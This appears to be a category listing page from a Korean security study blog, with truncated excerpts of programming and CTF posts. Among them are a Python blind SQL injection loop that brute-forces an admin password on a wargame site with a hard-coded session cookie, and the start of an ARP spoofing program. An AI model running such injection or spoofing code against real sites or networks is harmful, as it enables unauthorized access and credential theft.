Language24

• list 관련하여 해결 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 개요 2023.04.04 - [Language] - [python] list 사용하면서 정리 [python] list 사용하면서 정리 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음 blog.z3alous.xyz 해당 글에 이어서 작성하는 내용임. 내용 이전 내용대로 해.. Language 2023. 4. 8.

• [python] list 사용하면서 정리 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 개요 python 관련 코드 짜다가 이것저것 찾아보다가 정리하는 글임. 내용 python코드 작성 중 list에 있는 값을 replace를 해야하는 경우가 발생했다. 일반 문자열처럼 a.replace('a','b')로 하면되는데 list는 또 다르다고 하던데... 흠.... 그래서 어떻게 해야할까 생각을 했는데 temp에 임시적으로 넣어서 일반적으로 하는 방식으로 해도 처리는 되던데... 무작정 temp에.. Language 2023. 4. 4.

• 과거에 작성한 원클릭 하드닝? 간단한 batch코드 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 과거에 이것 저것하다가 사용자 pc에 설정의 개념에서 취약한 부분을 점검하고 수정해주는 batch 파일을 작성한 적이 있다. 파일 정리를 하다가 발견되어 기록을 하기 위해 남겨둔다. 지금도 코드수정을 조금만 하면 사용할 수 있을것이다. @echo off title 원클릭 취약점 패치 color 6F set memberNo=623 set trainingNo=22 mkdir C:\Temp cls mode co.. Language 2023. 2. 5.

• 간단하지만 약간의 고민이 필요했던 ... 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 업무를 하면서 php를 사용함에 있어 한가지 고민을 한것이 있었다. 사실 간단한거였지만 왜 그 생각을 못했을까라고 생각을 한거였다. 바로 코드를 한번 보자 해당 코드는 보면 알듯이 파일을 열어서 확인하고 라인 수를 따지는 코드이다. 그래프에 값을 넣기위해선 int형이 되야한다. 라인수는 당연하게 int형으로 선언이 된다. 만약에 txt파일안에 숫자가 들어있다라고 하고 그 숫자를 그래프에 반영해야한다면? 말.. Language 2023. 1. 25.

• 

  요즘 핫한 ChatGPT를 사용해보자:) 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 사실 chatGPT가 처음 나왔을때 엄청 인기가 많아서 한번 사용해볼까 했는뎅 안하다가 요즘에도 계속 인기가 많아서 한번 사용을 해보려고 한다. https://chat.openai.com/auth/login 해당 홈페이지에서 가입을 하면되는데 구글 아이디를 이용하여 가입이 가능하다. 그런데 접속을하면 .... 이러한 문구가 나온다... 더 이상 받아들일 수 없다고 하는데 ... 해당 문구가 발생하면 시크릿.. Language 2023. 1. 24.

• php 와 javascript를 사용하면서 해결하지 못한 문제... 최근들어 php와 javascript를 사용하여 무언가를 만들어야 하는 상태라 열심히 만들어보려고 하고있으나 한개의 풀리지 않는 문제가 있다. 사실 큰 문제는 아니지만 뭔가 거슬린다. 일단 코드를 보자. 해당 코드는 tempfile.txt를 읽어와서 | 구분자로 나누게 되어 있다. 여기서 explode의 함수로 인하여 배열형식을 가지게 되는데 문제는 마지막 값에 공백이 포함된다는 것! 그말은 즉슨 [0]=' ' 이런느낌을 가지게 된다는 것이다. 해당 데이터를 그냥 사용할때도 약간의 문제가 있지만 table에 넣을 경우엔 이거 참 ... 허허 trim을 이용하여 없애보려고 시도도 해보고 추가적인 다른방법을 통해서도 해보았으나 마지막 공백은 지워지지않았다. table에 넣었을때 문제는 공백의 빈값을 포함하다.. Language 2023. 1. 15.

• php와 shell script 동시에 사용하기 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 업무를 하다보니 어쩔수없이 개발을 해야하는 경우가 발생한다. 개발의 '개'도 몰르는데 어찌어찌 개발을 하긴한다... 최근에 업무를 하면서 다양한 언어를 사용해야하는 일이 있었다. 실질적으로 사용한 언어로는 front : html, css ,javascript back : php data : javascript, python, shell script 이렇게 사용한 것 같다. php를 하다보니 리눅스 서버에서.. Language 2023. 1. 7.

• 

  R script를 이용한 시각화 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 데이터 분석 및 로그 분석을 하다보면 대량의 데이터를 분석해야하는 경우가 많다. 나의 블로그에 보면 access로그 같은 것을 분석하는 것을 작성을 해둔적이있다. 2020.11.02 - [Security Study/Network] - access 로그 분석 할때 꿀팁 access 로그 분석 할때 꿀팁 access 로그를 분석할때 많은 어려움이 존재한다. 예를 들어 음 .... access 로그를 보면 양이.. Language 2022. 12. 18.

• Notepad 띄우기 - Process 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 과거자료를 찾아보다가 BoB할때 과제로 받았던 내용이 있어서 작성해본다. 과제는 그냥 Notepad를 띄우는 거였는데... 기억하기로는 파일크기를 특정하게 만들어서 notepad를 생성 하는 거였다. #include #include #include #define DIR_LEN_BUFSIZE int _tmain(int argc, TCHAR* argv[]) { STARTUPINFO si = { 0, }; PR.. Language 2022. 11. 7.

• Changes in Python 3.6 1. f string formatting (PEP 498) You can avoid the inconvenience of having to kill variables when using the .format () method or%. >>> lang = 'Python' >>> author = 'Guido van Rossum' >>> 'Language: {}, Author: {}'.format(lang, author) Language: Python, Author: Guido van Rossum >>> f'Language: {lang}, Author: {author}' Language: Python, Author: Guido van Rossum 2. Type hint (PEP 484) In 3.5, type.. Language 2016. 12. 24.

• base 64 원하는 횟수만큼 decoding 하기 python (파일 넣어서) # -*- coding:utf-8 -*- import base64 f = open("")#파일 명 (경로) Buff = f.readlines() Buff = str(Buff) for x in range(0, 50): #50자리에 반복하고 싶은 횟수 Buff = base64.decodestring(Buff) print Buff Language 2016. 12. 22.

• individual bands of image.py from PIL import Imageimport numpy as np im = Image.open('heartbleed.png') # In this case, it's a 3-band (red, green, blue) image# so we'll unpack the bands into 3 separate 2D arrays.r, g, b = np.array(im).T # Let's make an alpha (transparency) band based on where blue is < 100a = np.zeros_like(b)a[b Language 2016. 12. 21.

• RGB image analysis.py import numpy as npimport mpl_toolkits.mplot3d.axes3d as p3import matplotlib.pyplot as pltimport colorsysfrom PIL import Image # (1) Import the file to be analyzed!img_file = Image.open("sunset.jpg")img = img_file.load() # (2) Get image width & height in pixels[xs, ys] = img_file.sizemax_intensity = 100hues = {} # (3) Examine each pixel in the image filefor x in xrange(0, xs): for y in xrange(0, .. Language 2016. 12. 21.

• 

  image GPS.py from PIL import Imagefrom PIL.ExifTags import TAGS filename = "sunset.jpg"extension = filename.split('.')[-1]if (extension == 'jpg') | (extension == 'JPG') | (extension == 'jpeg') | (extension == 'JPEG') | (extension == 'PNG') |(extension == 'png'): try: img = Image.open(filename) info = img._getexif() exif = {} for tag, value in info.items(): decoded = TAGS.get(tag, tag) exif[decoded] = value #.. Language 2016. 12. 21.

• 

  base image.py from PIL import Image img = Image.open("filename.jpg")print(img.size)print(img.format) img.show() Language 2016. 12. 21.

• python 같은 파일 뽑아내기 :) 사전파일에 파일이름과 폴더를 지정해주면 중복파일을 뽑아줍니다 :) # -*- coding: utf-8 -*- import os f = open('/Users/z3alous/Desktop/flag1.txt', 'w') Language 2016. 12. 18.

• md5 한번에 인코딩하기 :) ex)폴더지정 # -*- coding: utf-8 -*-import hashlibimport os f = open('/Users/z3alous/Desktop/flag.txt', 'w') def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() for root, dirs, files in os.walk('폴더 경로'): for fname in files: full_fname = os.path.join(root, fname) f.write(md5(full_fname) + '\n') f.. Language 2016. 12. 18.

• rsa.py_ctf #값넣으면 ''없애기...p = ''g =''a = ''b = '' C = ''CA = pow(C,a,p)CAB = pow(CA,b,p) print("key_is",CAB) Language 2016. 12. 12.

• toolhelp #include #include #include#include#include int _tmain(int argc, _TCHAR* argv[]){ /* */HANDLE hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process;process.dwSize = sizeof(PROCESSENTRY32); _tprintf(_T("%32s %8s %8s %8s\n"), L"[NAME]", L"[PID]", L"[THREAD]", L"[PPID]"); while (Process32Next(hProcess, &process)){_tprintf(_T("%32s %8d %8d %8d\n"),process.szExeFile, // pr.. Language 2015. 9. 24.

• C언어 정리 C언어의 장점C언어는 절차지향적 특성을 지닌다. 때문에 익숙해지는데 오랜 시간이 걸리지 않는다. 즉, 절차지향 프로그래밍에서 중심이 되는 것은 ‘순서’이다.C언어로 작성된 프로그램은 이식성이 좋다.C언어로 구현된 프로그램은 좋은 성능을 보인다. C언어는 기본적으로 함수로 시작해서 함수로 끝난다.int => 출력형태 main => 함수이름 (void) => 입력형태 위의 int와 void는 각각 출력과 입력의 형태를 설명하는 것이다. 즉, 출력의 형태가 int 이고 입력의 형태가 void인 main이라는 함수 C언어의 함수 내에 존재하는 문장의 끝에는 세미콜론 문자 ;을 붙여준다. printf 함수는 함수호출 시 전달되는 문자열의 모니터에 출력하는 기능을 지닌다. 이는 직접 만들지 않아도 호출이 가능한, .. Language 2015. 9. 22.

• arp spoofing.c 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. #include "Arp.h" int main(int argc, char **argv) { pcap_if_t *alldevs; pcap_if_t *d; int inum; pcap_t *adhandle; char packet_filter[] = ""; struct bpf_program fcode; u_int netmask; pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; int .. Language 2015. 9. 8.

• Mac Capture.c #define WPCAP #define HAVE_REMOTE #include "pcap.h" #include #include typedef struct arphdr { u_char DMac[6]; // target hardware address u_char SMac[6]; // sender hardware address u_int16_t type; // operation code u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits) u_char tos; // Type of service u_short tlen; // Total length u_short identification; // I.. Language 2015. 9. 8.

• blind sql injection.py #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and(substring(pw," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) req.add_header('cookie',"ASPSESSIONIDSSATDDSQ=EMNOHBMDIHNLAAFFOHICOODE") res = urllib2.urlop.. Language 2015. 9. 8.

• base 64 encoding import base64 str64="0cc175b9c0f1b6a831c399e2697726618277e0910d750195b448797616e091ad6f8f57715090da2632453988d9a1501b865c0c0b4ab0e063e5caa3387c1a87417b8b965ad4bca0e41ab51de7b31363a1d41d8cd98f00b204e9800998ecf8427e" # base 64구문str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Language 2015. 9. 8.